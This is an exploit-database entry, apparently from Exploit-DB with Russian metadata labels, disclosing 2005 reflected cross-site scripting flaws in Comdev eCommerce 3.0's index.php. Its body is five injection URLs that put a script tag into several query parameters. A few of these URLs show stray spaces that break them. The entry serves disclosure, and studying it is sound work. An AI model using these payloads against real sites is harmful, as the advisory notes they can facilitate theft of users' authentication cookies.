Exploit Comdev eCommerce 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

[Exploiter]

EDB-ID

25062

Проверка EDB

1. Пройдено

Автор

SMOK3

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

N/A

Дата публикации

2005-01-25

source: https://www.securityfocus.com/bid/12382/info

Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks.

Comdev eCommerce 3.0 is reported prone to these issues. It is likely that previous versions are vulnerable as well. 

index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=